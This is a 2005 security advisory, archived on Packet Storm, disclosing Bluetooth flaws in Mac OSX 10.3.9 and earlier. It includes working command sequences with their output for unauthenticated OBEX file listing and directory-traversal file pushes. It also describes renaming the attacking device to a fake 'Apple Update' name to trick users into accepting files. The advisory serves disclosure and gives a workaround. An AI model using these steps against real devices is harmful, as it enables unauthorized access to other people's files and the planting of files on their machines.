what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

DMA-2005-0502a.txt

DMA-2005-0502a.txt
Posted Aug 6, 2005
Authored by Kevin Finisterre

Apple OSX suffers from multiple bluetooth vulnerabilities.

tags | advisory, vulnerability
systems | apple
SHA-256 | 1f2d239e36a2a11e6998d72399a7c9b0cdc8dcabb42c9fdd577e9c7bfc8b8182

DMA-2005-0502a.txt

Change Mirror Download
DMA[2005-0502a] - 'Apple OSX multiple Bluetooth vulnerabilities'
Author: Kevin Finisterre
Vendor: http://www.apple.com/bluetooth/
Product: 'Mac OSX <=10.3.9'
References:
http://www.digitalmunition.com/DMA[2005-0502a].txt

Description:
Starting with Mac OSX 10.2 Apple decided to include support for Bluetooth devices. Apple's Bluetooth
Software Technology Preview was also available for a brief period of time on Mac OSX 10.1.4. With
the Bluetooth technology that is integrated in Mac OS X, you can easily connect your Apple computer
with your Palm OS-based handheld device, mobile phone and other peripherals with Bluetooth technology.

In addition to the new PowerBook G4 portable line, Bluetooth-enabled computers are available across
Apple's entire CPU product line, including iBook, iMac G5, eMac, Mac mini and Power Mac G5. Bluetooth
is available in some cases as a standard feature and in others as an addon option. You can even enable
your previous-generation iBook, iMac or Power Mac by simply plugging in a Bluetooth USB Adapter and
letting Mac OSX takes care of the rest.

During the development of 'greenplaque' several trips to my local "Cup O' Joe" began to turn up boat
loads of bluetoth devices. After multiple runs I started to notice that the first 3 bytes of many of
the devices began with either 00:0D:93 or 00:03:93. A quick run to the OID lookup offered by Jason
Coffer (http://coffer.com/mac_find/) I discovered that these devices were Macintosh computers. For some
reason coffee shops seem to be yupie central, there are bluetooth enabled Macs everywhere!

Once I got home and plugged one of my bluetooth sticks into my evil Orange iMac it all started to make
sense. When you install OSX for the first time the hostname of the computer is set to the owners name.
The OSX bluetooth settings derive the device name from the hostname. This behavior explains why all of
the machines using the Apple OID had a Bluetooth device name of 'Firstname Lastnameâs Computer'. Please
make note of the â in the device name. For some reason OSX loves to stuff this character in place of an
apostrophe, knowing this could help you fingerprint a Macintosh device that is not using the Apple
integrated Bluetooth radio.

The first thing I noticed about the Apple bluetooth implementation was that the default behavior of the
OBEX Ftp service allowed access to the /Users/Shared directory and it did not require any sort of user
authentication. The best part was that this service was enabled by default once a user had logged into
the machine.

The following output demonstrates the ability to view files located in /Users/Shared.

animosity:/home/kfinisterre# qobexclient -t bluetooth -d 00:11:B1:07:BE:A7 -l
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<folder name="Faxes" created="19961103T141500Z" size="0"/>
<folder name="New Folder" created="19961103T141500Z" size="0"/>
<folder name="SC Info" created="19961103T141500Z" size="0"/>
</folder-listing>

The above behavior is actually what prompted me to contact Apple about their Bluetooth software. The
initial conversation consisted of me arguing that "...just because someone on my local LAN has access
to the files in /Users/Shared, that does not mean that I want some random Joe Schmoe out on the sidwalk
to have access to them as well".

Shortly after this discovery Justin Tibbs and I started to notice that several applications appear to
be using /Users/Shared as a config file repository. For example we found that GarageBand, Quicken,
Microsoft RDP client, Blizzard World of Warcraft and iTunes all dumped random files into /Users/Shared.
Even 'SC Info.sidb' aka the iTunes database of decryption keys seems to be up for grabs over Bluetooth.

In addition to being able to browse the files located in /Users/Shared you also have the ability to place
files onto the machine in the same directory. This may for example allow you to place potentially
offensive or illegal material onto an individuals computer.

After I did a bit more research the fun really began. Aside from offering OBEX File Transfer OSX also offers
OBEX Object Push services. Object push is usually used for passing business cards to other Bluetooth users.
After my wonderful user experience with Widcomm I figured I would try some old tricks with my new dog.
Object push has an option called "Folder for Accpeted Items". Under normal circumstances all files should be
dropped into this directory, however this restriction is can be bypassed. OBEX FTP appears to be vulnerable
to a directory transversal attack.


The first step is obviously to check what channel OPUSH is on.
animosity:/home/kfinisterre# sdptool browse 00:11:B1:07:BE:A7
Browsing 00:11:B1:07:BE:A7 ...
Service Name: Bluetooth-PDA-Sync
Service RecHandle: 0x10004
Service Class ID List:
"Serial Port" (0x1101)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 3
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Serial Port" (0x1101)
Version: 0x0100

Service Name: OBEX Object Push
Service RecHandle: 0x10002
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x00000100)
"RFCOMM" (0x0003)
Channel: 10
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"OBEX Object Push" (0x1105)
Version: 0x0100

Service Name: OBEX File Transfer
Service RecHandle: 0x10003
Service Class ID List:
"OBEX File Transfer" (0x1106)
Protocol Descriptor List:
"L2CAP" (0x00000100)
"RFCOMM" (0x0003)
Channel: 15
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"OBEX File Transfer" (0x1106)
Version: 0x0100

Fire up an rfcomm connection.
animosity:/home/kfinisterre# rfcomm connect 0 00:11:B1:07:BE:A7 10
Connected /dev/rfcomm0 to 00:11:B1:07:BE:A7 on channel 10
Press CTRL-C for hangup

Drop a file in /tmp.
kfinisterre@animosity:~/ussp-push-0.3$ ./ussp-push /dev/rfcomm0 /etc/hosts ../../../../../../../../../tmp/blah
pushing file /etc/hosts
name=/etc/hosts, size=257
Registered transport

set user data

created new objext

started a new request
reqdone
Command (00) has now finished, rsp: 20Connected!

Connection return code: 0, id: 0
Connection established
connected to server
Sending file: ../../../../../../../../../tmp/blah, path: /etc/hosts, size: 257

At this point the Mac user is prompted by a window with the title 'incomming File Transfer'. The options
are to 'Decline' or 'Accept' with the ability to also 'Accept all without warning' by clicking a check
box. There is a bluetooth icon with the device name of the connecting machine. I find this to be very
useful in helping to get a user to click accept.

Consider the following as an example.
animosity:/home/kfinisterre/ussp-push-0.3# hciconfig hci0 name *Sexy*Blonde*5*tables*over

animosity:/home/kfinisterre/ussp-push-0.3# hciconfig hci0 name *Critical*Apple*Bluetooth*Update

animosity:/home/kfinisterre/ussp-push-0.3# hciconfig hci0 name *Apple*Update*Please*Click*Accept


Luckily for an attacker only the basename() form of the file being transfered is shown. In the above example
all we would see is 'blah' as the incomming filename. Odds are that most 'toothy' males would accept any file
from the Sexy Blonde 5 tables over.

After you coax the user to accept the file either via clicking 'Accept' or pressing enter the above it will
promptly be dropped in /tmp.

Kevin-Finisterres-Computer:~kevinfinisterre$ ls /tmp
501 blah mcx_compositor

The final issue that I was able to take advantage of is quite convient in determining if the above attack was
successful. Lucky for us OBEX File Transfer service also happens to be vulnerable to directory transversal.

animosity:/home/kfinisterre# qobexclient -t bluetooth -d 00:11:B1:07:BE:A7 -l -c ../
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder />
<file name="4D WebSTAR Installer.log" created="19961103T141500Z" size="195662"/>
<folder name="johnh" created="19961103T141500Z" size="0"/>
<folder name="kevinfinisterre" created="19961103T141500Z" size="0"/>
<folder name="Shared" created="19961103T141500Z" size="0"/>
<folder name="webstar" created="19961103T141500Z" size="0"/>
</folder-listing>

animosity:/home/kfinisterre# qobexclient -t bluetooth -d 00:11:B1:07:BE:A7 -l -c ../../
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder />
<folder name="Applications" created="19961103T141500Z" size="0"/>
<folder name="automount" created="19961103T141500Z" size="0"/>
<folder name="bin" created="19961103T141500Z" size="0"/>
<folder name="cores" created="19961103T141500Z" size="0"/>
<file name="Desktop DB" created="19961103T141500Z" size="3584"/>
<file name="Desktop DF" created="19961103T141500Z" size="4482"/>
<folder name="dev" created="19961103T141500Z" size="0"/>
<folder name="Developer" created="19961103T141500Z" size="0"/>
<file name="etc" created="19961103T141500Z" size="11"/>
<folder name="Library" created="19961103T141500Z" size="0"/>
<file name="mach" created="19961103T141500Z" size="9"/>
<file name="mach.sym" created="19961103T141500Z" size="570532"/>
<file name="mach_kernel" created="19961103T141500Z" size="3863716"/>
<folder name="Network" created="19961103T141500Z" size="0"/>
<folder name="private" created="19961103T141500Z" size="0"/>
<folder name="sbin" created="19961103T141500Z" size="0"/>
<folder name="System" created="19961103T141500Z" size="0"/>
<file name="tmp" created="19961103T141500Z" size="11"/>
<folder name="Users" created="19961103T141500Z" size="0"/>
<folder name="usr" created="19961103T141500Z" size="0"/>
<file name="var" created="19961103T141500Z" size="11"/>
<folder name="Volumes" created="19961103T141500Z" size="0"/>
</folder-listing>

I can not confirm nor deny that files can be placed or retrieved via OBEX FTP and the ../../ method.
I have only been able to list files using my current obex client. A modified client my yield different
results.

enjoy.

Work Around:
Unplug your dongle! Install 2005-005 update or disable bluetooth support within the OS.
http://www.apple.com/support/downloads/

Timeline associated with this bug:

Thu, 10 Mar 2005 Follow-up: 7841131 assigned by auto ticketing sytem.
Sat, 12 Mar 2005 dispute usage of /Users/Shared with bluetooth with Apple.
Thu, 17 Mar 2005 Apple is 'still investigating this issue'. Introduce greenplaque to Apple.
Sat, 19 Mar 2005 Justin Tibbs (jay ex tizzle) pointed out World of Warcraft uses /Users/Shared
Sat, 19 Mar 2005 JxT and KF discover and report that iTunes leaves its auth db in /Users/Shared
Sun, 20 Mar 2005 OBEX Object Push directory transversal issues discovered and reported.
Mon, 04 Apr 2005 OBEX File transfer daemon flaws and reported
Sat, 09 Apr 2005 more Apple followups
Thu, 23 Apr 2005 AppleSeed testing begins
Tue, 03 May 2005 I guess someone forgot to tell me, today is apparantly public disclosure day.

All your bluetooth are belong to greenplaque!

-KF


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close